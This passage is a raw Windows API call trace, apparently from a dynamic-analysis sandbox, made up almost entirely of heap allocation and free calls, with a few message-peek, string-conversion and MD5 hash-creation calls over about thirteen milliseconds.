(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0242.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0242.726] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0242.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0242.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0242.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0242.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0242.726] CryptCreateHash (in: hProv=0xad2a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0242.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0242.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0242.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0242.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0242.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0242.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0242.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0242.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0242.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0242.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0242.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0242.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0242.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0242.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0242.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0242.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0242.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0242.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0242.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0242.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0242.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0242.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0242.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0242.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0242.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0242.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0242.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0242.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0242.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0242.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0242.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0242.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0242.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0242.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0242.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0242.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0242.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0242.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0242.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0242.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0242.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0242.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0242.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0242.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0242.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0242.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0242.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0242.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0242.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0242.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0242.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0242.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0242.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0242.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0242.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0242.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0242.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0242.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0242.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0242.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0242.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0242.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0242.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0242.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0242.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0242.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0242.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0242.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0242.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0242.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0242.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0242.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0242.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0242.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0242.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0242.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0242.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0242.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0242.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0242.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0242.731] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0242.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0242.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0242.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0242.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0242.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0242.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0242.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0242.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0242.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0242.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0242.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0242.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0242.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0242.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0242.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0242.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0242.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0242.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0242.732] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0242.732] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0242.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0242.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0242.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0242.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0242.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0242.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0242.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0242.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0242.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0242.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0242.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0242.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0242.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0242.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0242.733] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0242.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0242.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0242.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0242.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0242.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0242.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0242.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0242.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0242.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0242.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0242.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0242.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x24b1c08 [0242.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0242.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0242.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0242.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0242.734] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x24b16f8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0242.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0242.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0242.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0242.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0242.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0242.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0242.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0242.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0242.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0242.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0242.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0242.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0242.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0242.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0242.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0242.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0242.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0242.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0242.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0242.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0242.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0242.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0242.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0242.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0242.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0242.736] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0242.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0242.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0242.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0242.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0242.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0242.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0242.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0242.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0242.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0242.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0242.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0242.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0242.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0242.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0242.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0242.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0242.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x24b1778 [0242.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0242.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0242.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0242.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0242.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0242.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0242.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0242.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0242.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0242.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0242.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0242.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0242.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0242.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0242.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0242.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0242.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0242.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0242.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0242.738] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0242.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0242.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0242.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0242.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0242.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0242.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0242.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0242.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0242.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0242.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0242.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0242.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0242.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0242.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0242.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0242.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0242.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0242.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0242.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0242.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0242.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0242.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0242.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0242.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x3) returned 0x24b1c98 [0242.739] 